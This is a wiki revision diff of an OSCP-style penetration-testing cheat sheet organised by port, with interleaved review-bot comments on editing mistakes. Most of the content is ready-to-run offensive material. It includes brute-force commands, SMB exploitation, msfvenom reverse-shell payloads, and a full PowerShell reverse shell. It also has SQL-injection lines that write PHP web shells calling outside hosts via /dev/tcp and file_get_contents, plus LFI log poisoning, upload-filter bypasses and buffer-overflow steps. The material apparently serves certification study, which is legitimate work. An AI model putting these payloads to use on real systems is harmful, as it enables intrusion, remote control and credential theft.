oscp_survival_guide

Differences

This page shows the differences between the selected revision and the current version of the page.


oscp_survival_guide [2020/11/25 14:16]
M0N5T3R
oscp_survival_guide [2021/02/06 22:47] (current version)
M0N5T3R
Ligne 1: Ligne 1:
- 
 ---- ----
  
Ligne 2463: Ligne 2462:
       `use exploit/windows/smb/eternalblue_doublepulsar       `use exploit/windows/smb/eternalblue_doublepulsar
       msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10       msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
-      RHOST => 10.11.1.73+      RHOST => 10.11.1.x
       msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe       msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
       PROCESSINJECT => spoolsv.exe       PROCESSINJECT => spoolsv.exe
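Review bot: the scrubbed output on the changed line no longer matches its own command: two lines up the transcript still reads `set RHOST 10.10.10.10`, yet the echoed result is now `RHOST => 10.11.1.x`. Use one placeholder on both lines (either `10.10.10.10` or `10.11.1.x`) so the excerpt stays a consistent session; masking lab addresses is the right habit, but it has to be applied uniformly.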
Ligne 2718: Ligne 2717:
 -   Transfer files to windows machines -   Transfer files to windows machines
     https://blog.netspi.com/15-ways-to-download-a-file/     https://blog.netspi.com/15-ways-to-download-a-file/
 +
 +</code>
 +
          
-EDIT: +====== EDIT: Useful and fast exploit - Cheat sheet ====== 
-Useful and fast exploit :+ 
 +**Port 22 - SSH**  
 +<code> 
 +hydra -l $USERNAME -P /usr/share/wordlists/wfuzz/others/common_pass.txt ssh://$RHOST 
 +</code> 
 + 
 + 
 +**Port 25 - SMTP **  
 +<code> 
 +nc 10.11.1.217 25 
 +[...] 
 +VRFY root 
 +252 2.0.0 root 
 +</code> 
 + 
 + 
 + 
 +**Port 53 - DNS**  
 +<code> 
 +dig axfr @$RHOST DOMAIN.COM 
 +dnsrecon -d DOMAIN.COM 
 +</code> 
 + 
 + 
 + 
 +**Port 69 - UDP - TFTP** 
 +<code>#nmap -p69 --script=tftp-enum.nse 10.11.1.111</code> 
 + 
 +#exploit AT-TFTP 1.9 : https://github.com/brianwrf/cve-2006-6184 
 +<code>perl -e 'print ""\x81\xec\xac\x0d\x00\x00""' > stackadj 
 +msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.x LPORT=443 R > payload 
 +cat stackadj payload > shellcode 
 +cat shellcode | msfvenom -e x86/shikata_ga_nai -b ""\x00"" -a x86 --platform win -f python 
 +</code> 
 + 
 +**Port 88 - Kerberos**  
 +<code> 
 +- MS14-068 
 +- GetUserSPNs 
 +GET USERS: 
 +nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP 
 +use auxiliary/gather/kerberos_enumusers 
 +https://www.tarlogic.com/blog/como-funciona-kerberos/ 
 +https://www.tarlogic.com/blog/como-atacar-kerberos/ 
 +python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt 
 +https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/ 
 +nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP 
 +use auxiliary/gather/kerberos_enumusers 
 +https://www.tarlogic.com/blog/como-funciona-kerberos/ 
 +https://www.tarlogic.com/blog/como-atacar-kerberos/ 
 +python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt 
 +https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/ 
 +</code> 
 + 
 + 
 +**Port 111 - Rpcbind** 
 +<code> 
 +nmap -sV -p 111 --script=rpcinfo $RHOST 
 +nmap -p 111 --script nfs* $RHOST 
 +mount -t nfs -o vers=3 $RHOST:/SHARENAME /mnt 
 +groupadd --gid 1337 pwn 
 +useradd --uid 1337 -g pwn pwn 
 + 
 + 
 + 
 +rpcinfo -p 10.11.1.111 
 +rpcclient -U "" 10.11.1.111 
 + srvinfo 
 + enumdomusers 
 + getdompwinfo 
 + querydominfo 
 + netshareenum 
 + netshareenumall 
 +</code> 
 + 
 + 
 +**Port 135 - MSRPC** 
 +<code>nmap 10.11.1.111 --script=msrpc-enum 
 +msf > use exploit/windows/dcerpc/ms03_026_dcom 
 +</code> 
 + 
 + 
 +**Port 161 -  SNMP** 
 +<code>snmp-check $RHOST 
 +onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $RHOST 
 +snmpwalk -v1 -c public $RHOST 
 +nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $IP 
 +nmap -sU -p 161 --script /usr/share/nmap/scripts/snmp-win32-users.nse $IP 
 +</code> 
 + 
 +**Port 139/445 - SMB** 
 +<code># Get Version 
 +smbver.sh 10.11.1.111 
 +Msfconsole;use scanner/smb/smb_version 
 +ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'  
 +smbclient -L \\\\10.11.1.111 
 + 
 +# Get Shares 
 +smbmap -H  10.11.1.111 -R <sharename> 
 +echo exit | smbclient -L \\\\10.11.1.111 
 +smbclient \\\\10.11.1.111\\<share> 
 +smbclient -L //10.11.1.111 -N 
 +nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111 
 +smbclient -L \\\\10.11.1.111\\ 
 + 
 + 
 +# Check null sessions 
 +smbmap -H 10.11.1.111 
 +rpcclient -U "" -N 10.11.1.111 
 +smbclient //10.11.1.111/IPC$ -N 
 + 
 +# Exploit null sessions 
 +enum -s 10.11.1.111 
 +enum -U 10.11.1.111 
 +enum -P 10.11.1.111 
 +enum4linux -a 10.11.1.111 
 +/usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111 
 + 
 +# Connect to username shares 
 +smbclient //10.11.1.111/share -U username 
 + 
 +# Connect to share anonymously 
 +smbclient \\\\10.11.1.111\\<share> 
 +smbclient //10.11.1.111/<share> 
 +smbclient //10.11.1.111/<share\ name> 
 +smbclient //10.11.1.111/<""share name""> 
 +rpcclient -U " " 10.11.1.111 
 +rpcclient -U " " -N 10.11.1.111 
 + 
 +# Check vulns 
 +nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111 
 + 
 +# Check common security concerns 
 +msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc 
 + 
 +# Extra validation 
 +msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_validate.rc 
 + 
 + 
 +# Multi exploits 
 +msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run 
 + 
 +# Bruteforce login 
 +medusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt  
 +nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111  -vvvv 
 +nmap –script smb-brute 10.11.1.111 
 + 
 +# nmap smb enum & vuln  
 +nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111 
 +nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111 
 + 
 +# Mount smb volume linux 
 +mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share 
 + 
 + 
 +# rpcclient commands 
 +rpcclient -U "" 10.11.1.111 
 + srvinfo 
 + enumdomusers 
 + getdompwinfo 
 + querydominfo 
 + netshareenum 
 + netshareenumall 
 + 
 +# Run cmd over smb from linux 
 +winexe -U username //10.11.1.111 "cmd.exe" --system 
 + 
 +# smbmap 
 +smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum 
 +smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE 
 +smbmap.py -H 10.11.1.111 -u username -p 'P@$$w0rd1234!' -L # Drive Listing 
 +smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell
  
 +# Check
 +\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt "
  
-exploit SMB VULN MS08-067 : https://0xdf.gitlab.io/2019/02/21/htb-legacy.html+#exploit SMB VULN MS08-067 : https://0xdf.gitlab.io/2019/02/21/htb-legacy.html
 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
 wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
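Review bot: the new Kerberos block repeats six lines verbatim (from the first `nmap -p 88 --script=krb5-enum-users ...` line through the stealthbits URL), so one copy should be dropped. Two more points in this hunk: the `smb_checks.rc` and `smb_validate.rc` lines spell the path `/usr/share/metasploit-framwork/`, which does not exist on Kali (the directory is `metasploit-framework`), so both `msfconsole -r ...` commands fail as pasted; and in the TFTP section the `#exploit AT-TFTP 1.9 : https://github.com/brianwrf/cve-2006-6184` reference sits between two `<code>` blocks rather than inside one, so it renders as wiki text instead of as a comment. The doubled quotes in that block (`'print ""\x81...""'`, `-b ""\x00""`) are carried over from the old revision and look like CSV-style escaping rather than shell syntax; normalizing them while the section is being moved would avoid readers pasting broken quoting.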
Ligne 2733: Ligne 2908:
  
  
-exploit SMB VULN MS1710 MS017-10+#exploit SMB VULN MS1710 MS017-10
 git clone https://github.com/SecureAuthCorp/impacket git clone https://github.com/SecureAuthCorp/impacket
 cd impacket/ cd impacket/
 pip install . pip install .
 git clone https://github.com/helviojunior/MS17-010.git git clone https://github.com/helviojunior/MS17-010.git
-msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.228 LPORT=443  -f exe -o ms17-010.exe+msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.LPORT=443  -f exe -o ms17-010.exe
 python send_and_execute.py 10.10.175.236 ms17-010.exe  python send_and_execute.py 10.10.175.236 ms17-010.exe 
 root@kali:~/OSCP/VMs/10.10.14.36/MS17-010# netcat -lnvp 443 root@kali:~/OSCP/VMs/10.10.14.36/MS17-010# netcat -lnvp 443
 listening on [any] 443 ... listening on [any] 443 ...
 C:\WINDOWS\system32> C:\WINDOWS\system32>
 +</code>
  
 +**Port 161/162 UDP - SNMP**
 +<code>nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111
 +snmp-check 10.11.1.111 -c public|private|community</code>
  
-exploit AT-TFTP 1.9 : https://github.com/brianwrf/cve-2006-6184 
-perl -e 'print ""\x81\xec\xac\x0d\x00\x00""' > stackadj 
-msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.89 LPORT=443 R > payload 
-cat stackadj payload > shellcode 
-cat shellcode | msfvenom -e x86/shikata_ga_nai -b ""\x00"" -a x86 --platform win -f python 
  
-SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692) +**Port 389,636 - LDAP ** 
-https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh+<code>ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com" 
 +ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password' 
 +ldapdomaindump 10.11.1.111 -u 'DOMAIN\user' -p 'hash-password' 
 +patator ldap_login host=10.10.1.111 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.' 
 +</code>
  
-    +**Port 443 - HTTPS** 
 +<code>Read the actual SSL CERT to: 
 +find out potential correct vhost to GET 
 +is the clock skewed 
 +any names that could be usernames for bruteforce/guessing. 
 +sslscan 10.11.1.111:443 
 +./testssl.sh -e -E -f -p  -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html 
 +nmap -sV --script=ssl-heartbleed 10.1.10.111 
 +mod_ssl,OpenSSL version Openfuck
 </code> </code>
 +
 +**Port  500 - ISAKMP IKE**
 +<code>ike-scan 10.11.1.111</code>
 +
 +**Port 513 - Rlogin**
 +<code>apt install rsh-client
 +rlogin -l root 10.11.1.111
 +</code>
 +
 +**Port 541 - FortiNet SSLVPN**
 +<code>https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
 +</code>
 +
 +**Port 1433 - MSSQL**
 +<code>nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111
 +use auxiliary/scanner/mssql/mssql_ping
 +use auxiliary/scanner/mssql/mssql_login
 +use exploit/windows/mssql/mssql_payload
 +sqsh -S 10.11.1.111 -U sa
 + xp_cmdshell 'date'
 +</code>
 +
 +**Port 1521 - Oracle**
 +<code>oscanner -s 10.11.1.111 -P 1521
 +tnscmd10g version -h 10.11.1.111
 +tnscmd10g status -h 10.11.1.111
 +nmap -p 1521 -A 10.11.1.111
 +nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute
 +MSF: good modules under auxiliary/admin/oracle and scanner/oracle
 +
 +./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521
 +./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521
 +./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE
 +
 +Upload reverse shell with ODAT:
 +./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe
 +
 +and run it:
 +./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe
 +</code>
 +
 +**Port 2049 - NFS**
 +<code>showmount -e 10.11.1.111
 +If you find anything you can mount it like this:
 +mount 10.11.1.111:/ /tmp/NFS
 +mount -t 10.11.1.111:/ /tmp/NFS
 +</code>
 +
 +
 +**Port 2100 - Oracle XML DB**
 +<code>Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
 +</code>
 +
 +
 +**Port 3306 - MySQL**
 +<code>nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306
 +mysql --host=10.11.1.111 -u root -p
 +MYSQL UDF 
 +https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
 +</code>
 +
 +
 +**Port 3389 - RDP**
 +<code>
 +nmap -p 3389 --script=rdp-vuln-ms12-020.nse
 +rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111
 +rdesktop -u guest -p guest 10.11.1.111 -g 94%
 +ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111
 +</code>
 +
 +**VNC - 5900**
 +<code>nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111
 +</code>
 +
 +
 +**RealVNC**
 +<code>RealVNC : https://www.exploit-db.com/exploits/36932
 +Edit, BIND_ADDR into mine and BIND_PORT into 4444
 +root@kali:~/PWK$python RealVNC-exploit-36932.py
 +[] Please input an IP address to pwn: 10.11.1.x
 +[] Hello From Server: RFB 003.008
 +Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del
 +</code>
 +
 +
 +**Port 5985 - WinRM **
 +<code>https://github.com/Hackplayers/evil-winrm
 +gem install evil-winrm
 +evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
 +evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder
 +</code>
 +
 +
 +
 +**Port 6379 - Redis **
 +<code>https://github.com/Avinash-acid/Redis-Server-Exploit
 +python redis.py 10.10.10.160 redis
 +</code>
 +
 +
 +**Port 8172 - MsDeploy **
 +<code>Microsoft IIS Deploy port
 +IP:8172/msdeploy.axd
 +</code>
 +
 +
 +**Port 8080- Groovy RCE**
 +<code>def process = "cmd /c whoami".execute();println "${process.text}";
 +#Groovy RevShell
 +String host="localhost";
 +int port=8044;
 +String cmd="cmd.exe";
 +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);Inpu
 +</code>
 +
 +
 +
 +**Port 8080- SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)**
 +<code>https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh
 +</code>
 +
 +
 +
 +**XAMPP**
 +<code>XAMPP cred(wampp/xampp)
 +</code>    
 +
 +**ColdFusion (Vulnerable)**
 +<code>Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
 +LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
 +(either – neo-security.xml and password.properties)
 +ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
 +exploit/windows/http/coldfusion_fckeditor – only for 8.0.1
 +</code>
 +
 +
 +**Webdav**
 +<code>
 +WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.x
 +auxiliary : webdav_test
 +1 cadaver http://10.11.x.x/webdav/
 +Uploading shells.txt to `shells.txt’
 +1 dav:> put shells.txt
 +2 dav:> copy shells.txt shells.asp;.txt
 +</code>
 +
 +
 +**PHPAdmin** 
 +<code>http://.../phpmyadmin
 +db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank)
 +You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"
 +</code>
 +
 +
 +**Tomcat** 
 +<code>Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.x:8080/manager/html
 +You can upload reverse shell on manager consor ; msfvenom jsp or war file
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.x LPORT=443 -f war > shell.war
 +jar -xvf shell.war
 +</code>
 +
 +**Windows IIS** 
 +<code>Getting Windows 0S and version details through Nikto / Nmap Scanning.
 +auxiliary/admin/http/iis_auth_bypass
 +</code>
 +
 +**mysql**
 +<code>
 +nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
 +MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac
 +MySQL Spawning Reverse shell(linux) : union select ""<?php exec(\""/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\"");"" INTO OUTFILE '/var/www/ecustomers/samshell4.php'
 +UPLOAD A FILE :
 +' union select ""<?php file_put_contents(\""root\"", file_get_contents(\""http://attack.samsclass.info/root\"")); ?>"" INTO OUTFILE '/var/www/ecustomers/samget2.php' #
 +OPEN A PHP SHELL :
 +' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE 
 +</code>
 +
 +
 +
 +**ShellShock**
 +<code>
 +nikto scan results; shows shellshock on /cgi-bin; use 34900.py
 +root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234
 +[!] Started reverse shell handler
 +[-] Trying exploit on : /cgi-bin/status"
 +</code>
 +
 +
 +**Squid** 
 +<code>proxy scanner/http/squid_pivot_scanning
 +RHOST : Target
 +RANGE : Target
 +RPORT : Squid port
 +msf auxiliary(scanner/http/squid_pivot_scanning) > run
 +[+] [192.168.88.155] 192.168.88.155 is alive but 21 is CLOSED
 +[+] [192.168.88.155] 192.168.88.155:80 seems OPEN
 +if the target uses squid proxy via 3128 port, use nikto with that proxy setting 
 +nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128"
 +</code>
 +
 +
 +**LFI**
 +<code>
 +fimap -u "http://10.11.1.111/example.php?test="
 +
 +# Ordered output
 +curl -s http://10.11.1.111/gallery.php?page=/etc/passwd
 +/root/Tools/Kadimus/kadimus -u http://10.11.1.111/example.php?page=
 +
 +http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
 +http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00 or ?
 +?page=php://filter/convert.base64-encode/resource=../config.php
 +../../../../../boot.ini
 +
 +amap -d 10.11.1.111 8000
 +
 +# LFI Windows
 +http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
 +
 +# Contaminating log files
 +root@kali:~# nc -v 10.11.1.111 80
 +10.11.1.111: inverse host lookup failed: Unknown host
 +(UNKNOWN) [10.11.1.111] 80 (http) open
 + <?php echo shell_exec($_GET['cmd']);?> 
 + 
 +http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig
 +</code>
 +
 +
 +
 +**RFI(Remote File Inclusion)** 
 +<code>browse.php?file=http://10.11.0.x/index.html
 +browse.php?file=ftp://10.11.0.x/index.html
 +browse.php?expect://ls
 +
 +Uploading malicious .php file on database 
 +http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html
 +</code>
 +
 +
 +**Cookies error padding:**
 +<code>
 +# Get cookie structure
 +padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding"
 +# Get cookie for other user (impersonation)
 +padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorme'
 +</code>
 +
 +
 +
 +**Bypass image upload restrictions**
 +<code>
 +- Change extension: .pHp3 or pHp3.jpg
 +- Modify mimetype: Content-type: image/jpeg
 +- Bypass getimagesize(): exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
 +- Add gif header: GIF89a;
 +- All at the same time.
 +</code>
 +
 +**Password brute force - last resort**
 +<code>
 +cewl
 +hash-identifier
 +john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
 +medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
 +ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111
 +crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1
 +hydra -l root -P password-file.txt 10.11.1.111 ssh
 +hydra -P password-file.txt -v 10.11.1.111 snmp
 +hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V
 +hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V
 +hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V
 +
 +# SIMPLE LOGIN GET
 +hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V
 +
 +# GET FORM with HTTPS
 +hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"
 +
 +# SIMPLE LOGIN POST
 +hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
 +
 +# API REST LOGIN POST
 +hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64
 +
 +# Dictionary creation
 +https://github.com/LandGrey/pydictor
 +https://github.com/Mebus/cupp
 +git clone https://github.com/sc0tfree/mentalist.git
 +</code>
 +
 +
 +**BOF**
 +<code>
 +# BASIC GUIDE
 +1. Send "A"*1024
 +2. Replace "A" with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l LENGTH
 +3. When crash "!mona findmsp" (E10.11.1.111 offset) or ""/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q TEXT" or "!mona pattern_offset eip"
 +4. Confirm the location with "B" and "C"
 +5. Check for badchars instead CCCC (ESP):
 +badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
 +with script _badchars.py and 
 +"!mona compare -a esp -f C:\Users\IEUser\Desktop\badchar_test.bin"
 + 5.1 AWESOME WAY TO CHECK BADCHARS (https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/):
 + a. !mona config -set workingfolder c:\logs\%p
 +     b. !mona bytearray -b "\x00\x0d"
 +     c. Copy from c:\logs\%p\bytearray.txt to python exploit and run again
 +     d. !mona compare -f C:\logs\%p\bytearray.bin -a 02F238D0 (ESP address)
 +     e. In " data", before unicode chars it shows badchars.
 + 6. Find JMP ESP with "!mona modules" or "!mona jmp -r esp" or "!mona jmp -r esp -cpb '\x00\x0a\x0d'" find one with security modules "FALSE"
 + 
 + 6.1 Then, "!mona find -s "\xff\xe4" -m PROGRAM/DLL-FALSE"
 + 6.2 Remember put the JMP ESP location in reverse order due to endianness: 5F4A358F will be \x8f\x35\x4a\x5f
 +
 +
 +7. Generate shellcode and place it:
